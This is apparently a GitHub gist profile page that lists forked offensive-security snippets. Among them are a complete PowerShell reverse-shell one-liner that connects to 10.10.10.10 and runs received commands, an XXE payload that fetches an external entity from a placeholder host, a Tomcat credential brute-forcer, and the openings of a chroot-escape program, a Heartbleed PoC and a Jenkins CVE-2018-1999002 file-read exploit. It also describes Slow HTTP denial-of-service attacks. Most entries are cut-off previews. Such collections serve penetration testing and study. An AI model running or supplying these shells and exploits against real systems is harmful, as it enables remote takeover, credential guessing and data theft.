Skip to content

Instantly share code, notes, and snippets.

View 0x6b7966's full-sized avatar

Michael Feng 0x6b7966

44 followers · 180 following
View GitHub Profile
@0x6b7966
0x6b7966 / ns-ipv6-no-nat.sh
Created January 21, 2022 07:25 — forked from dpino/ns-ipv6-no-nat.sh
Create Network Namespace with IPv6 connectivity via Hurricane Electric tunnel (no NAT66 needed)
#!/usr/bin/env bash
set -x
if [[ $EUID -ne 0 ]]; then
echo "You must run this script as root."
exit 1
fi
# Fill up IPv6 addresses for the veth pair. Addresses must belong to the
@0x6b7966
0x6b7966 / chroot-esc.c
Created March 17, 2021 01:46 — forked from 0xquad/chroot-esc.c
chroot jail escape methods
/*
* Simple chroot jail escape
* Copyright (c) 2015, Alexandre Hamelin <alexandre.hamelin gmail.com>
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
@0x6b7966
0x6b7966 / powershell_reverse_shell.ps1
Created November 8, 2019 06:59 — forked from egre55/powershell_reverse_shell.ps1
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
@0x6b7966
0x6b7966 / tomcat_brute_force.py
Created November 8, 2019 06:59 — forked from egre55/tomcat_brute_force.py
tomcat_brute_force
# author: @egre55
# script to automate the testing of common apache tomcat credentials
#!/usr/bin/env python
import sys
import requests
with open('tomcat-betterdefaultpasslist.txt') as f:
for line in f:
@0x6b7966
0x6b7966 / hb-test.py
Created September 26, 2019 01:28 — forked from takeshixx/hb-test.py
OpenSSL heartbeat PoC with STARTTLS support.
#!/usr/bin/env python2
"""
Author: takeshix <[email protected]>
PoC code for CVE-2014-0160. Original PoC by Jared Stafford ([email protected]).
Supportes all versions of TLS and has STARTTLS support for SMTP,POP3,IMAP,FTP and XMPP.
"""
import sys,struct,socket
from argparse import ArgumentParser
@0x6b7966
0x6b7966 / nginx-status.nse
Created September 20, 2019 14:35 — forked from johnl/nginx-status.nse
nmap script to check if a service is serving an nginx status page
local http = require "http"
local nmap = require "nmap"
local shortport = require "shortport"
local string = require "string"
description = [[
Detects if the service is serving an nginx status page
]]
---
@0x6b7966
0x6b7966 / CVE-2018-1999002.py
Created September 10, 2019 05:18 — forked from becojo/CVE-2018-1999002.py
import requests
import sys
import os
PLUGIN = 'credentials'
BACKDIR_COUNT = 10
if len(sys.argv) != 3:
print 'usage:\n\tpython CVE-2018-1999002.py [jenkins base url] [absolute file path]'
print ''
@0x6b7966
0x6b7966 / slow_http_attacks.md
Created August 7, 2019 07:05 — forked from nielsvanderbeke/slow_http_attacks.md
Slow HTTP Attacks

Slow HTTP attacks are denial-of-service (DoS) attacks in which the attacker sends HTTP requests in pieces slowly, one at a time to a Web server. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. When the server’s concurrent connection pool reaches its maximum, this creates a DoS. Slow HTTP attacks are easy to execute because they require only minimal resources from the attacker.

Attack exploits the fact that most of modern web servers are not limiting the connection duration if there is a data flow going on, and with possiblity to prolong TCP connection virtually forever with zero or minimal data flow by manipulating TCP receive window size value, it is possible to acquire concurent connections pool of the application. Possibility to prolong TCP connection is described in several vulnerability reports: MS09-048, CVE-2008-4609, CVE-2009-1925, CVE-2009-1926 .

Prerequisites for the successful attack are: - victim serve

@0x6b7966
0x6b7966 / XXE_payloads
Created July 16, 2019 04:57 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@0x6b7966
0x6b7966 / README.md
Created July 14, 2019 23:52 — forked from FrankSpierings/README.md
Linux Container Escapes and Hardening